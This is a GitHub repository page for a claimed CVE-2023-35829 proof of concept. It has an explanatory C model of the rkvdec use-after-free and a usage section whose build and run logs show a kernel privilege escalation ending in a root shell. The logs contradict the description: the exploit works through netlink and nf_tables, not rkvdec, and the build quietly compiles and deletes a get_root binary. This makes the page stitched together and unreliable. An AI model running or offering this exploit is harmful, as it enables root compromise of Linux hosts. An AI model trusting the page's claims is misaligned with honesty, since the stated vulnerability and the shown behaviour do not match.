apkc / CVE-2023-35829-poc

CVE-2023-35829: Linux kernel before 6.3.2. A use-after-free was found in rkvdec_remove in drivers/staging/media/rkvdec/rkvdec.c.

CVE-2023-35829-poc

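The bug this repository names is a teardown race: rkvdec_probe registers a delayed watchdog work item that rkvdec_device_run arms for each decode job, and rkvdec_remove freed the device while that work could still be queued, so the worker later wrote through a dangling pointer. The upstream fix cancels the watchdog (cancel_delayed_work_sync on rkvdec->watchdog_work) before the device memory goes away. The following user-space model of that pattern is an added example, not code from this repository or from the kernel; the toy workqueue, the struct layout and the function names ending in _vulnerable and _fixed are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct rkvdec_dev;
typedef void (*work_fn)(struct rkvdec_dev *dev);

/* Stand-in for a kernel delayed_work embedded in the device struct. */
struct delayed_work {
    work_fn func;
    struct rkvdec_dev *dev;
};

/* One slot of a toy workqueue (constructed for this model). It keeps a copy
 * of the queued item plus the address it was queued from, the way the real
 * workqueue keeps a pointer into the device's memory. */
struct queued_work {
    work_fn func;
    struct rkvdec_dev *dev;
    uintptr_t work_addr;
};

#define MAX_WORK 8
static struct queued_work workqueue[MAX_WORK];
static int workqueue_len;

struct rkvdec_dev {
    char name[16];
    struct delayed_work watchdog_work;   /* armed by every decode job */
    int job_timed_out;
};

static void queue_delayed_work(struct delayed_work *w)
{
    if (workqueue_len == MAX_WORK) abort();
    workqueue[workqueue_len].func = w->func;
    workqueue[workqueue_len].dev = w->dev;
    workqueue[workqueue_len].work_addr = (uintptr_t)w;
    workqueue_len++;
}

/* Model of cancel_delayed_work_sync(): drop every queued instance of w. */
static void cancel_delayed_work_sync(struct delayed_work *w)
{
    int kept = 0;
    for (int i = 0; i < workqueue_len; i++)
        if (workqueue[i].work_addr != (uintptr_t)w)
            workqueue[kept++] = workqueue[i];
    workqueue_len = kept;
}

/* The worker thread: runs everything queued. Returns how many items ran. */
static int run_pending_work(void)
{
    int ran = workqueue_len;
    for (int i = 0; i < workqueue_len; i++)
        workqueue[i].func(workqueue[i].dev);   /* UAF if dev was freed */
    workqueue_len = 0;
    return ran;
}

/* The watchdog writes through dev: this is the access that goes wrong. */
static void rkvdec_watchdog_func(struct rkvdec_dev *dev)
{
    dev->job_timed_out = 1;
}

static struct rkvdec_dev *rkvdec_probe(void)
{
    struct rkvdec_dev *dev = calloc(1, sizeof *dev);
    if (!dev) abort();
    strcpy(dev->name, "rkvdec");
    dev->watchdog_work.func = rkvdec_watchdog_func;   /* INIT_DELAYED_WORK */
    dev->watchdog_work.dev = dev;
    return dev;
}

static void rkvdec_device_run(struct rkvdec_dev *dev)
{
    queue_delayed_work(&dev->watchdog_work);          /* job started */
}

/* Before the fix: the device is freed while its watchdog may be queued. */
static void rkvdec_remove_vulnerable(struct rkvdec_dev *dev)
{
    free(dev);
}

/* After the fix: cancel and wait for the watchdog, then free. */
static void rkvdec_remove_fixed(struct rkvdec_dev *dev)
{
    cancel_delayed_work_sync(&dev->watchdog_work);
    free(dev);
}

/* Probe, start a job, remove. Returns the number of queued items that still
 * refer to the freed device; anything above zero is a use-after-free waiting
 * for the worker to run. Only saved addresses are compared, so this function
 * itself never reads freed memory, and the dangling item is discarded. */
static int dangling_work_after_remove(int use_fixed_remove)
{
    workqueue_len = 0;
    struct rkvdec_dev *dev = rkvdec_probe();
    uintptr_t dev_addr = (uintptr_t)dev;
    rkvdec_device_run(dev);
    if (use_fixed_remove) rkvdec_remove_fixed(dev);
    else rkvdec_remove_vulnerable(dev);
    int dangling = 0;
    for (int i = 0; i < workqueue_len; i++)
        if ((uintptr_t)workqueue[i].dev == dev_addr) dangling++;
    workqueue_len = 0;
    return dangling;
}

/* Sanity check of the model: on a live device the watchdog runs normally. */
static int watchdog_fires_on_live_device(void)
{
    workqueue_len = 0;
    struct rkvdec_dev *dev = rkvdec_probe();
    rkvdec_device_run(dev);
    run_pending_work();
    int fired = dev->job_timed_out;
    rkvdec_remove_fixed(dev);
    return fired;
}

int main(void)
{
    printf("dangling work after vulnerable remove: %d\n", dangling_work_after_remove(0));
    printf("dangling work after fixed remove:      %d\n", dangling_work_after_remove(1));
    return 0;
}
```

The model keeps the worker from running the dangling item so it stays well defined; building the same program with -fsanitize=address and calling run_pending_work() after rkvdec_remove_vulnerable() is the way to watch the write land in freed memory.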
Usage

Build with make and run ./poc. Read the build log before running it on a host you care about: besides poc it compiles get_root_src/get_root.c to get_root and then deletes that binary, and the PoC's own log reports it working through netlink and nf_tables rather than the rkvdec driver named in the description, so check the sources first.

chris@experience:~/CVE-2023-35829-poc# make
cc -pthread -static -o poc obj/keyring.o obj/main.o obj/modprobe.o obj/netlink.o obj/nf_tables.o obj/simple_xattr.o obj/uring.o obj/util.o
strip poc
cc -o get_root get_root_src/get_root.c
rm -fr get_root
chris@experience:~/CVE-2023-35829-poc# ./poc
[+] CVE-2023-35829 PoC
[+] Second process currently waiting
[+] Get CAP_NET_ADMIN capability
[+] Netlink socket created
[+] Netlink socket bound
[+] Table table created
[+] Set for the leak created
[+] Set for write primitive created
[+] Leak succeed
[+] kaslr base found 0xffffffff9f000000
[+] physmap base found 0xffff910a00000000
[+] modprobe path changed !
[+] Modprobe payload setup
[?] waitpid
[?] sem_post
[+++] Got root shell, should exit?
# id
uid=0(root) gid=0(root) groups=0(root)

About

License: GNU General Public License v3.0


Languages

C 98.7%, Makefile 1.3%